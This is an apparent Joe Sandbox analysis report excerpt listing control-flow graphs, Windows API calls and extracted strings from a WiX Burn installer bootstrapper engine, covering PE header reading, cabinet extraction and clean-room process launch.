9abb7d-9abb87 GetLastError 477->481 478->462 479->478 488 9ab81d-9ab824 480->488 490 9abb89-9abb92 481->490 491 9abb94 481->491 482->472 483->482 485->486 492 9ab7db-9ab7eb call 9a3821 486->492 493 9ab7d6 486->493 495 9ab82a-9ab836 488->495 496 9abb58-9abb75 call 9a3821 488->496 490->491 498 9abb9b-9abbb1 call 9a3821 491->498 499 9abb96 491->499 492->477 493->492 501 9ab838-9ab83f 495->501 502 9ab841-9ab84a 495->502 511 9abb7a-9abb7b 496->511 516 9abbb2-9abbba call 9e0237 498->516 499->498 501->502 506 9ab884-9ab88b 501->506 508 9abb1b-9abb32 call 9a3821 502->508 509 9ab850-9ab876 ReadFile 502->509 513 9ab88d-9ab8af call 9a3821 506->513 514 9ab8b4-9ab8cb call 9a394f 506->514 523 9abb37-9abb3d call 9e0237 508->523 509->481 512 9ab87c-9ab882 509->512 511->516 512->488 513->511 526 9ab8ef-9ab904 SetFilePointerEx 514->526 527 9ab8cd-9ab8ea call 9a3821 514->527 516->452 537 9abb43-9abb44 523->537 529 9ab906-9ab910 GetLastError 526->529 530 9ab944-9ab969 ReadFile 526->530 527->430 533 9ab91d 529->533 534 9ab912-9ab91b 529->534 535 9ab96b-9ab975 GetLastError 530->535 536 9ab9a0-9ab9ac 530->536 538 9ab91f 533->538 539 9ab924-9ab934 call 9a3821 533->539 534->533 542 9ab982 535->542 543 9ab977-9ab980 535->543 540 9ab9ae-9ab9ca call 9a3821 536->540 541 9ab9cf-9ab9d3 536->541 544 9abb45-9abb47 537->544 538->539 561 9ab939-9ab93f call 9e0237 539->561 540->523 550 9aba0e-9aba21 call 9e4a05 541->550 551 9ab9d5-9aba09 call 9a3821 call 9e0237 541->551 546 9ab989-9ab99e call 9a3821 542->546 547 9ab984 542->547 543->542 544->452 545 9abb4d-9abb53 call 9a3a16 544->545 545->452 546->561 547->546 563 9aba2d-9aba37 550->563 564 9aba23-9aba28 550->564 551->544 561->537 567 9aba39-9aba3f 563->567 568 9aba41-9aba49 563->568 564->561 571 9aba5a-9ababa call 9a394f 567->571 572 9aba4b-9aba53 568->572 573 9aba55-9aba58 568->573 576 9abade-9abaff call 9cf360 call 9ab208 571->576 577 9ababc-9abad8 call 9a3821 571->577 572->571 573->571 576->544 584 9abb01-9abb11 call 9a3821 576->584 577->576 584->508
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 009AB502
                                                                                                                • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB550
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 009AB556
                                                                                                                • ReadFile.KERNELBASE(00000000,009A4461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB59E
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 009AB5A4
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB601
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB607
                                                                                                                • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB650
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB656
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB6C7
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB6CD
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB716
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB71C
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB765
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB76B
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB7B7
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB7BD
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB810
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB872
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB8FC
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB906
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                • API String ID: 3411815225-695169583
                                                                                                                • Opcode ID: 3d9929647a0c5548209b400be723140267d7314ea878ec082377956753ffe82f
                                                                                                                • Instruction ID: 06ea805f70bf2347e05679171eaa8912e77dec2ae714cd05dc8186e44fe5e206
                                                                                                                • Opcode Fuzzy Hash: 3d9929647a0c5548209b400be723140267d7314ea878ec082377956753ffe82f
                                                                                                                • Instruction Fuzzy Hash: 4D12F876D40235EBDB319B558C46FAB76A8EF86724F0141A9FE04BB282D7749D40CBE0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 587 9c0d16-9c0d2d SetEvent 588 9c0d6f-9c0d7d WaitForSingleObject 587->588 589 9c0d2f-9c0d39 GetLastError 587->589 590 9c0d7f-9c0d89 GetLastError 588->590 591 9c0db4-9c0dbf ResetEvent 588->591 592 9c0d3b-9c0d44 589->592 593 9c0d46 589->593 594 9c0d8b-9c0d94 590->594 595 9c0d96 590->595 596 9c0df9-9c0dff 591->596 597 9c0dc1-9c0dcb GetLastError 591->597 592->593 598 9c0d4d-9c0d5d call 9a3821 593->598 599 9c0d48 593->599 594->595 602 9c0d9d-9c0db2 call 9a3821 595->602 603 9c0d98 595->603 600 9c0e01-9c0e04 596->600 601 9c0e32-9c0e4b call 9a21ac 596->601 604 9c0dcd-9c0dd6 597->604 605 9c0dd8 597->605 618 9c0d62-9c0d6a call 9e0237 598->618 599->598 607 9c0e28-9c0e2d 600->607 608 9c0e06-9c0e23 call 9a3821 600->608 621 9c0e4d-9c0e5e call 9e0237 601->621 622 9c0e63-9c0e6e SetEvent 601->622 602->618 603->602 604->605 611 9c0ddf-9c0df4 call 9a3821 605->611 612 9c0dda 605->612 615 9c10e8-9c10ed 607->615 627 9c10de-9c10e4 call 9e0237 608->627 611->618 612->611 623 9c10ef 615->623 624 9c10f2-9c10f8 615->624 618->615 641 9c10e5-9c10e7 621->641 629 9c0ea8-9c0eb6 WaitForSingleObject 622->629 630 9c0e70-9c0e7a GetLastError 622->630 623->624 627->641 632 9c0eb8-9c0ec2 GetLastError 629->632 633 9c0ef0-9c0efb ResetEvent 629->633 636 9c0e7c-9c0e85 630->636 637 9c0e87 630->637 638 9c0ecf 632->638 639 9c0ec4-9c0ecd 632->639 642 9c0efd-9c0f07 GetLastError 633->642 643 9c0f35-9c0f3c 633->643 636->637 644 9c0e8e-9c0ea3 call 9a3821 637->644 645 9c0e89 637->645 649 9c0ed6-9c0eeb call 9a3821 638->649 650 9c0ed1 638->650 639->638 641->615 651 9c0f09-9c0f12 642->651 652 9c0f14 642->652 647 9c0f3e-9c0f41 643->647 648 9c0fab-9c0fce CreateFileW 643->648 662 9c10dd 644->662 645->644 656 9c0f6e-9c0f72 call 9a394f 647->656 657 9c0f43-9c0f46 647->657 654 9c100b-9c101f SetFilePointerEx 648->654 655 9c0fd0-9c0fda GetLastError 648->655 649->662 650->649 651->652 659 9c0f1b-9c0f30 call 9a3821 652->659 660 9c0f16 652->660 668 9c1059-9c1064 SetEndOfFile 654->668 669 9c1021-9c102b GetLastError 654->669 663 9c0fdc-9c0fe5 655->663 664 9c0fe7 655->664 680 9c0f77-9c0f7c 656->680 665 9c0f48-9c0f4b 657->665 666 9c0f67-9c0f69 657->666 659->662 660->659 662->627 663->664 674 9c0fee-9c1001 call 9a3821 664->674 675 9c0fe9 664->675 676 9c0f5d-9c0f62 665->676 677 9c0f4d-9c0f53 665->677 666->615 672 9c109b-9c10a8 SetFilePointerEx 668->672 673 9c1066-9c1070 GetLastError 668->673 678 9c102d-9c1036 669->678 679 9c1038 669->679 672->641 684 9c10aa-9c10b4 GetLastError 672->684 681 9c107d 673->681 682 9c1072-9c107b 673->682 674->654 675->674 676->641 677->676 678->679 687 9c103f-9c1054 call 9a3821 679->687 688 9c103a 679->688 685 9c0f9d-9c0fa6 680->685 686 9c0f7e-9c0f98 call 9a3821 680->686 690 9c107f 681->690 691 9c1084-9c1099 call 9a3821 681->691 682->681 693 9c10b6-9c10bf 684->693 694 9c10c1 684->694 685->641 686->662 687->662 688->687 690->691 691->662 693->694 699 9c10c8-9c10d8 call 9a3821 694->699 700 9c10c3 694->700 699->662 700->699
                                                                                                                APIs
                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,009C08BC,?,?), ref: 009C0D25
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,009C08BC,?,?), ref: 009C0D2F
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,009C08BC,?,?), ref: 009C0D74
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,009C08BC,?,?), ref: 009C0D7F
                                                                                                                • ResetEvent.KERNEL32(?,?,?,?,?,009C08BC,?,?), ref: 009C0DB7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,009C08BC,?,?), ref: 009C0DC1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                • API String ID: 1865021742-2104912459
                                                                                                                • Opcode ID: 7897d142a7ca9c6e919caede721a839e321859fa3a7ad42f3ed5b0f740aca70a
                                                                                                                • Instruction ID: 5eeb8f63031fdd4586d512d2e91a27de4663acd4afebaf8ef4e42ce07d235675
                                                                                                                • Opcode Fuzzy Hash: 7897d142a7ca9c6e919caede721a839e321859fa3a7ad42f3ed5b0f740aca70a
                                                                                                                • Instruction Fuzzy Hash: 80914377E80636E7D73056A94D4AF2A2954BF81B30F124628BF64BF2D1D354EC4092D7

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1124 9a4d39-9a4d81 call 9cf8e0 call 9a33c7 1129 9a4d83-9a4d90 call 9e0237 1124->1129 1130 9a4d95-9a4d9f call 9b98f7 1124->1130 1135 9a4f31-9a4f3b 1129->1135 1136 9a4da8-9a4db7 call 9b98fd 1130->1136 1137 9a4da1-9a4da6 1130->1137 1138 9a4f3d-9a4f42 CloseHandle 1135->1138 1139 9a4f46-9a4f4a 1135->1139 1145 9a4dbc-9a4dc0 1136->1145 1140 9a4ddd-9a4df8 call 9a1f13 1137->1140 1138->1139 1143 9a4f4c-9a4f51 CloseHandle 1139->1143 1144 9a4f55-9a4f59 1139->1144 1151 9a4dfa-9a4dff 1140->1151 1152 9a4e01-9a4e15 call 9b6a57 1140->1152 1143->1144 1147 9a4f5b-9a4f60 CloseHandle 1144->1147 1148 9a4f64-9a4f66 1144->1148 1149 9a4dc2 1145->1149 1150 9a4dd7-9a4dda 1145->1150 1147->1148 1154 9a4f6b-9a4f7f call 9a2782 * 2 1148->1154 1155 9a4f68-9a4f69 CloseHandle 1148->1155 1153 9a4dc7-9a4dd2 call 9e0237 1149->1153 1150->1140 1151->1153 1163 9a4e2f-9a4e43 call 9b6b13 1152->1163 1164 9a4e17 1152->1164 1153->1135 1168 9a4f89-9a4f8d 1154->1168 1169 9a4f81-9a4f84 call 9e5636 1154->1169 1155->1154 1176 9a4e4c-9a4e67 call 9a1f55 1163->1176 1177 9a4e45-9a4e4a 1163->1177 1166 9a4e1c 1164->1166 1170 9a4e21-9a4e2a call 9e0237 1166->1170 1173 9a4f8f-9a4f92 call 9e5636 1168->1173 1174 9a4f97-9a4f9f 1168->1174 1169->1168 1182 9a4f2e 1170->1182 1173->1174 1183 9a4e69-9a4e6e 1176->1183 1184 9a4e73-9a4e8c call 9a1f55 1176->1184 1177->1166 1182->1135 1183->1153 1187 9a4e98-9a4ec4 CreateProcessW 1184->1187 1188 9a4e8e-9a4e93 1184->1188 1189 9a4f01-9a4f17 call 9e0a28 1187->1189 1190 9a4ec6-9a4ed0 GetLastError 1187->1190 1188->1153 1194 9a4f1c-9a4f20 1189->1194 1192 9a4edd 1190->1192 1193 9a4ed2-9a4edb 1190->1193 1195 9a4edf 1192->1195 1196 9a4ee4-9a4efc call 9a3821 1192->1196 1193->1192 1194->1135 1197 9a4f22-9a4f29 call 9e0237 1194->1197 1195->1196 1196->1170 1197->1182
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009A10DD,?,00000000), ref: 009A33E8
                                                                                                                • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 009A4F40
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 009A4F4F
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 009A4F5E
                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 009A4F69
                                                                                                                Strings
                                                                                                                • -%ls="%ls", xrefs: 009A4DE6
                                                                                                                • engine.cpp, xrefs: 009A4EEA
                                                                                                                • burn.filehandle.self, xrefs: 009A4E45
                                                                                                                • Failed to wait for clean room process: %ls, xrefs: 009A4F23
                                                                                                                • Failed to append %ls, xrefs: 009A4E1C
                                                                                                                • burn.filehandle.attached, xrefs: 009A4E17
                                                                                                                • Failed to append original command line., xrefs: 009A4E69
                                                                                                                • Failed to get path for current process., xrefs: 009A4D83
                                                                                                                • Failed to allocate full command-line., xrefs: 009A4E8E
                                                                                                                • burn.clean.room, xrefs: 009A4DDE
                                                                                                                • Failed to launch clean room process: %ls, xrefs: 009A4EF7
                                                                                                                • Failed to allocate parameters for unelevated process., xrefs: 009A4DFA
                                                                                                                • "%ls" %ls, xrefs: 009A4E7A
                                                                                                                • Failed to cache to clean room., xrefs: 009A4DC2
                                                                                                                • D, xrefs: 009A4EA9
                                                                                                                • %ls %ls, xrefs: 009A4E55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$FileModuleName
                                                                                                                • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                • API String ID: 3884789274-2391192076
                                                                                                                • Opcode ID: fb7b8ac4f8e9aeb04a6146bc601207fbdbbc415666fc8d00c9c3d706c13f3db3
                                                                                                                • Instruction ID: 226f12a07fbeaf468739ff38768341ebbcedd542e3375b20061c2a295e05b024
                                                                                                                • Opcode Fuzzy Hash: fb7b8ac4f8e9aeb04a6146bc601207fbdbbc415666fc8d00c9c3d706c13f3db3
                                                                                                                • Instruction Fuzzy Hash: 8071A632D4026AABCF229BA5CC45EEFBB78AF85720F100115F910B7291D7B49E418BE0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1201 9b752a-9b756f call 9cf8e0 call 9a762c 1206 9b757b-9b758c call 9ac407 1201->1206 1207 9b7571-9b7576 1201->1207 1213 9b7598-9b75a9 call 9ac26e 1206->1213 1214 9b758e-9b7593 1206->1214 1208 9b7814-9b781b call 9e0237 1207->1208 1215 9b781c-9b7821 1208->1215 1223 9b75ab-9b75b0 1213->1223 1224 9b75b5-9b75ca call 9ac4c8 1213->1224 1214->1208 1217 9b7829-9b782d 1215->1217 1218 9b7823-9b7824 call 9e5636 1215->1218 1221 9b782f-9b7832 call 9e5636 1217->1221 1222 9b7837-9b783c 1217->1222 1218->1217 1221->1222 1227 9b783e-9b783f call 9e5636 1222->1227 1228 9b7844-9b7851 call 9ac1bb 1222->1228 1223->1208 1232 9b75cc-9b75d1 1224->1232 1233 9b75d6-9b75e6 call 9cc001 1224->1233 1227->1228 1235 9b785b-9b785f 1228->1235 1236 9b7853-9b7856 call 9e5636 1228->1236 1232->1208 1242 9b75e8-9b75ed 1233->1242 1243 9b75f2-9b7665 call 9b5c33 1233->1243 1240 9b7869-9b786d 1235->1240 1241 9b7861-9b7864 call 9e5636 1235->1241 1236->1235 1245 9b786f-9b7872 call 9a3a16 1240->1245 1246 9b7877-9b787f 1240->1246 1241->1240 1242->1208 1250 9b7671-9b7676 1243->1250 1251 9b7667-9b766c 1243->1251 1245->1246 1252 9b7678 1250->1252 1253 9b767d-9b7698 call 9a5602 GetCurrentProcess call 9e0879 1250->1253 1251->1208 1252->1253 1257 9b769d-9b76b4 call 9a827b 1253->1257 1260 9b76ce-9b76e5 call 9a827b 1257->1260 1261 9b76b6 1257->1261 1267 9b76ee-9b76f3 1260->1267 1268 9b76e7-9b76ec 1260->1268 1262 9b76bb-9b76c9 call 9e0237 1261->1262 1262->1215 1269 9b774f-9b7754 1267->1269 1270 9b76f5-9b7707 call 9a821f 1267->1270 1268->1262 1271 9b7756-9b7768 call 9a821f 1269->1271 1272 9b7774-9b777d 1269->1272 1279 9b7709-9b770e 1270->1279 1280 9b7713-9b7723 call 9a3436 1270->1280 1271->1272 1286 9b776a-9b776f 1271->1286 1274 9b7789-9b779d call 9ba50c 1272->1274 1275 9b777f-9b7782 1272->1275 1288 9b779f-9b77a4 1274->1288 1289 9b77a6 1274->1289 1275->1274 1278 9b7784-9b7787 1275->1278 1278->1274 1283 9b77ac-9b77af 1278->1283 1279->1208 1292 9b772f-9b7743 call 9a821f 1280->1292 1293 9b7725-9b772a 1280->1293 1290 9b77b1-9b77b4 1283->1290 1291 9b77b6-9b77cc call 9ad5a0 1283->1291 1286->1208 1288->1208 1289->1283 1290->1215 1290->1291 1298 9b77ce-9b77d3 1291->1298 1299 9b77d5-9b77ed call 9acbc5 1291->1299 1292->1269 1300 9b7745-9b774a 1292->1300 1293->1208 1298->1208 1303 9b77ef-9b77f4 1299->1303 1304 9b77f6-9b780d call 9ac8e6 1299->1304 1300->1208 1303->1208 1304->1215 1307 9b780f 1304->1307 1307->1208
                                                                                                                Strings
                                                                                                                • Failed to get manifest stream from container., xrefs: 009B75CC
                                                                                                                • Failed to overwrite the %ls built-in variable., xrefs: 009B76BB
                                                                                                                • Failed to set source process folder variable., xrefs: 009B7745
                                                                                                                • Failed to set source process path variable., xrefs: 009B7709
                                                                                                                • Failed to get unique temporary folder for bootstrapper application., xrefs: 009B77CE
                                                                                                                • Failed to get source process folder from path., xrefs: 009B7725
                                                                                                                • Failed to set original source variable., xrefs: 009B776A
                                                                                                                • WixBundleSourceProcessPath, xrefs: 009B76F8
                                                                                                                • Failed to open attached UX container., xrefs: 009B758E
                                                                                                                • Failed to load catalog files., xrefs: 009B780F
                                                                                                                • Failed to parse command line., xrefs: 009B7667
                                                                                                                • WixBundleElevated, xrefs: 009B76A5, 009B76B6
                                                                                                                • WixBundleUILevel, xrefs: 009B76D6, 009B76E7
                                                                                                                • WixBundleSourceProcessFolder, xrefs: 009B7734
                                                                                                                • Failed to open manifest stream., xrefs: 009B75AB
                                                                                                                • Failed to load manifest., xrefs: 009B75E8
                                                                                                                • Failed to initialize variables., xrefs: 009B7571
                                                                                                                • Failed to extract bootstrapper application payloads., xrefs: 009B77EF
                                                                                                                • WixBundleOriginalSource, xrefs: 009B7759
                                                                                                                • Failed to initialize internal cache functionality., xrefs: 009B779F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                • API String ID: 32694325-1564579409
                                                                                                                • Opcode ID: 4e8b66dcccdb9046691cd2cfdb6a5ea9208fb74d756e1fa0712fa62579f006f6
                                                                                                                • Instruction ID: 759e805665b015079009dfa686b8378d79f6283313dc4257e811f89d014c9544
                                                                                                                • Opcode Fuzzy Hash: 4e8b66dcccdb9046691cd2cfdb6a5ea9208fb74d756e1fa0712fa62579f006f6
                                                                                                                • Instruction Fuzzy Hash: 7CA17372E4461ABADB129AE4CD85FEBF7ACBB84724F010626F615E7141DB70E904C7E0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1413 9b86d0-9b871e CreateFileW 1414 9b8720-9b872a GetLastError 1413->1414 1415 9b8764-9b8774 call 9e490d 1413->1415 1417 9b872c-9b8735 1414->1417 1418 9b8737 1414->1418 1422 9b878c-9b8797 call 9e3edd 1415->1422 1423 9b8776-9b8787 call 9e0237 1415->1423 1417->1418 1420 9b8739 1418->1420 1421 9b873e-9b875f call 9a3821 call 9e0237 1418->1421 1420->1421 1435 9b8908-9b891a call 9ce06f 1421->1435 1429 9b879c-9b87a0 1422->1429 1431 9b8901-9b8902 CloseHandle 1423->1431 1432 9b87bb-9b87c0 1429->1432 1433 9b87a2-9b87b6 call 9e0237 1429->1433 1431->1435 1432->1431 1437 9b87c6-9b87d5 SetFilePointerEx 1432->1437 1433->1431 1440 9b880f-9b881f call 9e4e3a 1437->1440 1441 9b87d7-9b87e1 GetLastError 1437->1441 1450 9b882b-9b883c SetFilePointerEx 1440->1450 1451 9b8821-9b8826 1440->1451 1444 9b87ee 1441->1444 1445 9b87e3-9b87ec 1441->1445 1446 9b87f0 1444->1446 1447 9b87f5-9b880a call 9a3821 1444->1447 1445->1444 1446->1447 1453 9b88f9-9b8900 call 9e0237 1447->1453 1454 9b883e-9b8848 GetLastError 1450->1454 1455 9b8876-9b8886 call 9e4e3a 1450->1455 1451->1453 1453->1431 1458 9b884a-9b8853 1454->1458 1459 9b8855 1454->1459 1455->1451 1464 9b8888-9b8898 call 9e4e3a 1455->1464 1458->1459 1462 9b885c-9b8871 call 9a3821 1459->1462 1463 9b8857 1459->1463 1462->1453 1463->1462 1464->1451 1469 9b889a-9b88ab SetFilePointerEx 1464->1469 1470 9b88ad-9b88b7 GetLastError 1469->1470 1471 9b88e2-9b88f2 call 9e4e3a 1469->1471 1472 9b88b9-9b88c2 1470->1472 1473 9b88c4 1470->1473 1471->1431 1478 9b88f4 1471->1478 1472->1473 1476 9b88cb-9b88e0 call 9a3821 1473->1476 1477 9b88c6 1473->1477 1476->1453 1477->1476 1478->1453
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,009A4DBC,?,?,00000000,009A4DBC,00000000), ref: 009B8713
                                                                                                                • GetLastError.KERNEL32 ref: 009B8720
                                                                                                                  • Part of subcall function 009E3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 009E3F73
                                                                                                                • SetFilePointerEx.KERNEL32(00000000,009EB4B8,00000000,00000000,00000000,?,00000000,009EB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009B87CD
                                                                                                                • GetLastError.KERNEL32 ref: 009B87D7
                                                                                                                • CloseHandle.KERNELBASE(00000000,?,00000000,009EB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009B8902
                                                                                                                Strings
                                                                                                                • Failed to seek to beginning of engine file: %ls, xrefs: 009B8779
                                                                                                                • Failed to zero out original data offset., xrefs: 009B88F4
                                                                                                                • Failed to create engine file at path: %ls, xrefs: 009B8751
                                                                                                                • cabinet.dll, xrefs: 009B887B
                                                                                                                • Failed to seek to signature table in exe header., xrefs: 009B886C
                                                                                                                • msi.dll, xrefs: 009B8814
                                                                                                                • Failed to copy engine from: %ls to: %ls, xrefs: 009B87A8
